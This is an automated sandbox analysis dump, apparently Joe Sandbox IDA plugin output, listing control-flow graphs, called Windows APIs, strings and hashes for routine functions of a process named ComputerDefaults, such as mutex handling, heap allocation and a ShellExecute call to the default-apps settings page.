7ff64d607ab7 3192->3194 3194->3193 3195 7ff64d607afa ReleaseSRWLockExclusive 3194->3195 3195->3193

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ff64d608a64-7ff64d608af4 GetCurrentProcessId call 7ff64d601d78 CreateMutexExW 3 7ff64d608af6-7ff64d608afd call 7ff64d60241c 0->3 4 7ff64d608b02-7ff64d608b1c WaitForSingleObjectEx 0->4 12 7ff64d608bbc-7ff64d608be8 call 7ff64d60a080 3->12 5 7ff64d608b2d-7ff64d608b32 4->5 6 7ff64d608b1e-7ff64d608b20 4->6 8 7ff64d608b39 5->8 10 7ff64d608b34-7ff64d608b37 5->10 6->8 9 7ff64d608b22-7ff64d608b27 6->9 14 7ff64d608b3c-7ff64d608b4d call 7ff64d60985c 8->14 9->5 13 7ff64d608d89-7ff64d608d95 call 7ff64d602b4c 9->13 10->14 18 7ff64d608b52-7ff64d608b5d 14->18 21 7ff64d608b76-7ff64d608b7f 18->21 22 7ff64d608b5f-7ff64d608b74 call 7ff64d602ad4 18->22 24 7ff64d608b81-7ff64d608b83 21->24 22->24 26 7ff64d608b8f-7ff64d608b92 24->26 27 7ff64d608b85-7ff64d608b8a 24->27 28 7ff64d608bea-7ff64d608c1f GetProcessHeap HeapAlloc 26->28 29 7ff64d608b94-7ff64d608b9e 26->29 30 7ff64d608d6c-7ff64d608d7e call 7ff64d602ad4 27->30 33 7ff64d608c40-7ff64d608c48 28->33 34 7ff64d608c21-7ff64d608c33 GetProcessHeap 28->34 31 7ff64d608ba0 29->31 35 7ff64d608ba2-7ff64d608ba5 30->35 31->35 37 7ff64d608c4a-7ff64d608c66 call 7ff64d602ad4 33->37 38 7ff64d608c6b-7ff64d608c78 33->38 34->33 40 7ff64d608ba7-7ff64d608baa call 7ff64d602c14 35->40 41 7ff64d608baf-7ff64d608bb2 35->41 49 7ff64d608d67 37->49 42 7ff64d608c7e-7ff64d608c98 call 7ff64d602cd0 38->42 43 7ff64d608d83-7ff64d608d88 call 7ff64d602bd4 38->43 40->41 41->12 47 7ff64d608bb4-7ff64d608bb7 call 7ff64d602be4 41->47 53 7ff64d608c9a-7ff64d608cb9 call 7ff64d602ad4 42->53 54 7ff64d608cf1-7ff64d608d5c memset call 7ff64d60640c InitializeCriticalSectionEx 42->54 43->13 47->12 49->30 60 7ff64d608cbb call 7ff64d602be4 53->60 61 7ff64d608cc0-7ff64d608cc8 53->61 59 7ff64d608d5f-7ff64d608d61 54->59 59->31 59->49 60->61 63 7ff64d608cca call 7ff64d602be4 61->63 64 7ff64d608ccf-7ff64d608cef GetProcessHeap HeapFree 61->64 63->64 64->59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCurrentErrorLastMutexObjectProcessSingleWait_vsnwprintf
                                                                    • String ID: Local\SM0:%d:%d:%hs$wil
                                                                    • API String ID: 3333087404-2303653343
                                                                    • Opcode ID: e9007fa09ba064655425e67a4c2ca793f052032be40b1625ad75541071089ece
                                                                    • Instruction ID: cfd4eda6398436b0617c84469bbed86b8b3e1865c97291c16546dfe4819b90a7
                                                                    • Opcode Fuzzy Hash: e9007fa09ba064655425e67a4c2ca793f052032be40b1625ad75541071089ece
                                                                    • Instruction Fuzzy Hash: 00919132E0CA4282E762FB15E4502BA67A5FF8ABD4F448135DE4E87B95EF3CE4419340

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 66 7ff64d609de0-7ff64d609e1c GetStartupInfoW 67 7ff64d609e1f-7ff64d609e2a 66->67 68 7ff64d609e47 67->68 69 7ff64d609e2c-7ff64d609e2f 67->69 72 7ff64d609e4c-7ff64d609e54 68->72 70 7ff64d609e3a-7ff64d609e45 Sleep 69->70 71 7ff64d609e31-7ff64d609e38 69->71 70->67 71->72 73 7ff64d609e56-7ff64d609e62 _amsg_exit 72->73 74 7ff64d609e64-7ff64d609e6c 72->74 77 7ff64d609ed0-7ff64d609ed8 73->77 75 7ff64d609e6e-7ff64d609e8a 74->75 76 7ff64d609ec5 74->76 78 7ff64d609e8e-7ff64d609e91 75->78 79 7ff64d609ecb 76->79 80 7ff64d609ef7-7ff64d609ef9 77->80 81 7ff64d609eda-7ff64d609eed _initterm 77->81 82 7ff64d609eb7-7ff64d609eb9 78->82 83 7ff64d609e93-7ff64d609e95 78->83 79->77 84 7ff64d609efb-7ff64d609efe 80->84 85 7ff64d609f05-7ff64d609f0c 80->85 81->80 82->79 89 7ff64d609ebb-7ff64d609ec0 82->89 88 7ff64d609e97-7ff64d609e9a 83->88 83->89 84->85 86 7ff64d609f38-7ff64d609f45 85->86 87 7ff64d609f0e-7ff64d609f1c call 7ff64d60a4a0 85->87 93 7ff64d609f47-7ff64d609f4c 86->93 94 7ff64d609f51-7ff64d609f56 86->94 87->86 98 7ff64d609f1e-7ff64d609f2e 87->98 91 7ff64d609eac-7ff64d609eb5 88->91 92 7ff64d609e9c-7ff64d609ea8 88->92 95 7ff64d60a026-7ff64d60a043 89->95 91->78 92->91 93->95 97 7ff64d609f5a-7ff64d609f61 94->97 100 7ff64d609fd7-7ff64d609fdb 97->100 101 7ff64d609f63-7ff64d609f66 97->101 98->86 102 7ff64d609feb-7ff64d609ff4 100->102 103 7ff64d609fdd-7ff64d609fe7 100->103 104 7ff64d609f68-7ff64d609f6a 101->104 105 7ff64d609f6c-7ff64d609f72 101->105 102->95 102->97 103->102 104->100 104->105 106 7ff64d609f82-7ff64d609fb6 call 7ff64d6086fc 105->106 107 7ff64d609f74-7ff64d609f80 105->107 110 7ff64d609fb8-7ff64d609fba exit 106->110 111 7ff64d609fc0-7ff64d609fc7 106->111 107->105 110->111 112 7ff64d609fc9-7ff64d609fcf _cexit 111->112 113 7ff64d609fd5 111->113 112->113 113->95
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                    • String ID:
                                                                    • API String ID: 642454821-0
                                                                    • Opcode ID: 44892b68cfbbf35649ad714c6d331116214daa0129c0309cef21ae5da1d4582f
                                                                    • Instruction ID: 7e674ea77ab24fcee7874b4a00cb90b48eaf181bb80a7f48e27436f7ddd60484
                                                                    • Opcode Fuzzy Hash: 44892b68cfbbf35649ad714c6d331116214daa0129c0309cef21ae5da1d4582f
                                                                    • Instruction Fuzzy Hash: 6F612971E0C61282EB62FF15A44027933A6BF8A7C4F588436DB4DD3695EF3CE941A700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleMutexRelease
                                                                    • String ID:
                                                                    • API String ID: 4207627910-0
                                                                    • Opcode ID: 465e52c582bf347a3a6002073a7f244c4851f303ac4294f47a2e650957eccc52
                                                                    • Instruction ID: 07e7753f7d2b26b04ffe7e7944788a91e9cda3a946ccd1f5ac74250f1a0e3c54
                                                                    • Opcode Fuzzy Hash: 465e52c582bf347a3a6002073a7f244c4851f303ac4294f47a2e650957eccc52
                                                                    • Instruction Fuzzy Hash: 33212925E08A8186E606BB61E45433DAA64FF8EB91F488171DA0A87B59EF3CD4559700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: OpenSemaphore$ErrorLast
                                                                    • String ID: _p0$wil
                                                                    • API String ID: 3042991519-1814513734
                                                                    • Opcode ID: 18324d2ea13c781e4fd26915f9eff08284dc89959c42f99e5fefe9df7c6cc69f
                                                                    • Instruction ID: 035ebd8d6acd8bf63bd917590c749a6e9a151b2163b9a2aa10a09e435904963f
                                                                    • Opcode Fuzzy Hash: 18324d2ea13c781e4fd26915f9eff08284dc89959c42f99e5fefe9df7c6cc69f
                                                                    • Instruction Fuzzy Hash: 9A516C22E1CA8285EA26FF2198506F963A5FF8ABC4F484132DA0E97755EF3CE505D700

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 179 7ff64d603dd4-7ff64d603e17 180 7ff64d603e1d-7ff64d603e20 179->180 181 7ff64d603eac 179->181 183 7ff64d603e22-7ff64d603e25 180->183 184 7ff64d603e9f-7ff64d603eaa 180->184 182 7ff64d603eb1-7ff64d603ee0 call 7ff64d603b28 181->182 193 7ff64d603ee2-7ff64d603ef5 call 7ff64d607f30 182->193 194 7ff64d603f3b-7ff64d603f3e 182->194 186 7ff64d603e91-7ff64d603e9d 183->186 187 7ff64d603e27-7ff64d603e2a 183->187 184->182 186->182 188 7ff64d603e83-7ff64d603e8f 187->188 189 7ff64d603e2c-7ff64d603e2f 187->189 188->182 191 7ff64d603e75-7ff64d603e81 189->191 192 7ff64d603e31-7ff64d603e34 189->192 191->182 195 7ff64d603e67-7ff64d603e73 192->195 196 7ff64d603e36-7ff64d603e39 192->196 199 7ff64d603efb-7ff64d603efe 193->199 197 7ff64d603fc4-7ff64d603fc8 194->197 198 7ff64d603f44-7ff64d603f4a 194->198 195->182 202 7ff64d603e3b-7ff64d603e41 196->202 203 7ff64d603e59-7ff64d603e65 196->203 200 7ff64d604000-7ff64d604026 call 7ff64d60a080 197->200 201 7ff64d603fca-7ff64d603fd4 197->201 198->197 204 7ff64d603f4c-7ff64d603f5b 198->204 205 7ff64d603f04-7ff64d603f36 199->205 206 7ff64d603fbf 199->206 201->200 207 7ff64d603fd6-7ff64d603ff8 201->207 202->181 208 7ff64d603e43-7ff64d603e57 202->208 203->182 210 7ff64d603f61-7ff64d603f6b 204->210 211 7ff64d603f5d 204->211 205->206 206->197 207->200 208->182 213 7ff64d603fb5 210->213 214 7ff64d603f6d-7ff64d603f77 210->214 211->210 213->206 216 7ff64d603f93-7ff64d603fb3 GetProcAddress 214->216 217 7ff64d603f79-7ff64d603f8c GetModuleHandleW 214->217 216->206 216->213 217->216
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RtlNotifyFeatureUsage$ntdll.dll
                                                                    • API String ID: 1646373207-2443152447
                                                                    • Opcode ID: f42211223e1ed4cb30028df4af28bc168941b2a603c50019d1930030e88c7f02
                                                                    • Instruction ID: 41f32ff2d3e3249e6bdf31413ccaab7435a8ba597a690a7132bc020c0b168e2b
                                                                    • Opcode Fuzzy Hash: f42211223e1ed4cb30028df4af28bc168941b2a603c50019d1930030e88c7f02
                                                                    • Instruction Fuzzy Hash: 9D616132F5CB0185FB56FF6CE89037923A1AB5A795F044236DE0E96794EE3CD548A200

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteShellmemset
                                                                    • String ID: ms-settings:defaultapps$open
                                                                    • API String ID: 3297275784-559834330
                                                                    • Opcode ID: bfe0b5bd9b8c93572bff182a45fda0fa759f9427530fe5bddf9e98edb722fa19
                                                                    • Instruction ID: 83231d670bfb8409b1e24a4f89270c0a3ef6a35b55827d4ed5f087025c1266aa
                                                                    • Opcode Fuzzy Hash: bfe0b5bd9b8c93572bff182a45fda0fa759f9427530fe5bddf9e98edb722fa19
                                                                    • Instruction Fuzzy Hash: 06214332F18A118EE711EFA4E4407EC37B1FB55788F40403AEA0D92B99EF799109DB80

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                    • String ID:
                                                                    • API String ID: 17069307-0
                                                                    • Opcode ID: ab797ed1832f9d368e298a24537deae50d71c9690b903a91da276a203632b71c
                                                                    • Instruction ID: be9ea35cbead58a9f3522abe5a23899fec975dbc2547645c1f3525e40cb49fa1
                                                                    • Opcode Fuzzy Hash: ab797ed1832f9d368e298a24537deae50d71c9690b903a91da276a203632b71c
                                                                    • Instruction Fuzzy Hash: CC213962E0CA868AEB12FF51A4103B96BA1FB4ABC4F488031DE4D57789EF7CD446D740

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                    • String ID:
                                                                    • API String ID: 17069307-0
                                                                    • Opcode ID: d2d42359461104592b9947970f3093837bdbc75a2f1e897cd0d7d2632c722dbc
                                                                    • Instruction ID: d8a481c01c1055ccefaabf29858a4a1644137734b3b127ed666b091cc028cb92
                                                                    • Opcode Fuzzy Hash: d2d42359461104592b9947970f3093837bdbc75a2f1e897cd0d7d2632c722dbc
                                                                    • Instruction Fuzzy Hash: AB410631E0CA5682FB56FB15E440B3867A1EF56BD4F488135CA2D827A5EF3DE881E740

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF64D606C32), ref: 00007FF64D607147
                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,00007FF64D606C32), ref: 00007FF64D60716B
                                                                      • Part of subcall function 00007FF64D608A64: GetCurrentProcessId.KERNEL32 ref: 00007FF64D608AA0
                                                                      • Part of subcall function 00007FF64D608A64: CreateMutexExW.KERNELBASE ref: 00007FF64D608AE2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireCreateCurrentMutexProcessRelease
                                                                    • String ID:
                                                                    • API String ID: 4097130892-0
                                                                    • Opcode ID: dc6b6e6b708ea0ea716b0de3441a69aa19e2c8a4c0ff3572e3965f7bf1919afe
                                                                    • Instruction ID: 507d1b6140f8547e2f20892de7db2097b1ec8856bc37db48b59c09ad2b26016a
                                                                    • Opcode Fuzzy Hash: dc6b6e6b708ea0ea716b0de3441a69aa19e2c8a4c0ff3572e3965f7bf1919afe
                                                                    • Instruction Fuzzy Hash: D8115822F09B5682EF15EF29E44032867A4FB4AFC8F294175CA1D83758EF38D966D340

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 330 7ff64d608f5c-7ff64d608fec GetCurrentProcessId call 7ff64d601d78 CreateMutexExW 333 7ff64d608ffa-7ff64d609014 WaitForSingleObjectEx 330->333 334 7ff64d608fee-7ff64d608ff5 call 7ff64d60241c 330->334 335 7ff64d609016-7ff64d609018 333->335 336 7ff64d609025-7ff64d60902a 333->336 342 7ff64d6090b4-7ff64d6090e0 call 7ff64d60a080 334->342 339 7ff64d60901a-7ff64d60901f 335->339 340 7ff64d609031 335->340 336->340 341 7ff64d60902c-7ff64d60902f 336->341 339->336 343 7ff64d609267-7ff64d609273 call 7ff64d602b4c 339->343 344 7ff64d609034-7ff64d609055 call 7ff64d60985c 340->344 341->344 351 7ff64d609057-7ff64d60906c call 7ff64d602ad4 344->351 352 7ff64d60906e-7ff64d609077 344->352 354 7ff64d609079-7ff64d60907b 351->354 352->354 356 7ff64d609087-7ff64d60908a 354->356 357 7ff64d60907d-7ff64d609082 354->357 359 7ff64d60908c-7ff64d609096 356->359 360 7ff64d6090e2-7ff64d609115 GetProcessHeap HeapAlloc 356->360 358 7ff64d60924a-7ff64d60925c call 7ff64d602ad4 357->358 367 7ff64d60909a-7ff64d60909d 358->367 361 7ff64d609098 359->361 363 7ff64d609136-7ff64d60913e 360->363 364 7ff64d609117-7ff64d609129 GetProcessHeap 360->364 361->367 365 7ff64d609140-7ff64d60915c call 7ff64d602ad4 363->365 366 7ff64d609161-7ff64d60916e 363->366 364->363 379 7ff64d609245 365->379 370 7ff64d609261-7ff64d609266 call 7ff64d602bd4 366->370 371 7ff64d609174-7ff64d60918e call 7ff64d602cd0 366->371 372 7ff64d6090a7-7ff64d6090aa 367->372 373 7ff64d60909f-7ff64d6090a2 call 7ff64d602c14 367->373 370->343 383 7ff64d6091e7-7ff64d60923a memset * 2 371->383 384 7ff64d609190-7ff64d6091af call 7ff64d602ad4 371->384 372->342 378 7ff64d6090ac-7ff64d6090af call 7ff64d602be4 372->378 373->372 378->342 379->358 385 7ff64d60923d-7ff64d60923f 383->385 388 7ff64d6091b6-7ff64d6091be 384->388 389 7ff64d6091b1 call 7ff64d602be4 384->389 385->361 385->379 391 7ff64d6091c0 call 7ff64d602be4 388->391 392 7ff64d6091c5-7ff64d6091e5 GetProcessHeap HeapFree 388->392 389->388 391->392 392->385
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCurrentErrorLastMutexObjectProcessSingleWait_vsnwprintf
                                                                    • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                    • API String ID: 3333087404-630742106
                                                                    • Opcode ID: 6f7d84b4440317a423f108b04749a86c099e71f251c84aa8d859b15a1fcfb5b7
                                                                    • Instruction ID: 0a073d04771eea5b3d9a5396cea75b90bbb81617074f8da633505095087f8b08
                                                                    • Opcode Fuzzy Hash: 6f7d84b4440317a423f108b04749a86c099e71f251c84aa8d859b15a1fcfb5b7
                                                                    • Instruction Fuzzy Hash: 4D818236E0C64282E722FF15E4406BA67A5EF8BBD4F448136DA4E87B95EF3DE4419700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 4104442557-0
                                                                    • Opcode ID: 6583c630ed2cb58c4f6a5431ada4aa6a173c23d649fac88a2aa21b99b7848529
                                                                    • Instruction ID: 62d1c1ba29b47bc0348e7562319d5c53ad41ef692f859ea7e065d3b44c57a03a
                                                                    • Opcode Fuzzy Hash: 6583c630ed2cb58c4f6a5431ada4aa6a173c23d649fac88a2aa21b99b7848529
                                                                    • Instruction Fuzzy Hash: A0112E32E08B458AEB05FF75E84426933A8FB0A798F400A34EA6D87754EF7CD5A48340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: NtQueryWnfStateData$ntdll.dll
                                                                    • API String ID: 1646373207-3115237368
                                                                    • Opcode ID: 2a69f6fce8df4bbe1ace093391107480c5bbbdaaffcc482deb6a7c1c70d8a2fd
                                                                    • Instruction ID: 760543581d7144b416471d7478f10470fdc4e9d84d7a5afb78221ff83a308f52
                                                                    • Opcode Fuzzy Hash: 2a69f6fce8df4bbe1ace093391107480c5bbbdaaffcc482deb6a7c1c70d8a2fd
                                                                    • Instruction Fuzzy Hash: F0010525E0DB4A86EA12FB1AF80013967A5FB5ABC5F448531D94D83724FF3CE0149B00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                    • String ID:
                                                                    • API String ID: 4268342597-0
                                                                    • Opcode ID: 31e149cf19a2b77c1d6795ea1ef988fa6cd5c803d02d30e0cabdd7b09a0d1c81
                                                                    • Instruction ID: 44cd9382f27ea5a6282cae7ba40bb99a3418f1fe2ee8f3bad378b6fa064d6e93
                                                                    • Opcode Fuzzy Hash: 31e149cf19a2b77c1d6795ea1ef988fa6cd5c803d02d30e0cabdd7b09a0d1c81
                                                                    • Instruction Fuzzy Hash: 97810A21E0C78286EA66FF15A44423967A4FF4ABC4F188035CA4D87769EE3CE481E751
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64D60A36B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
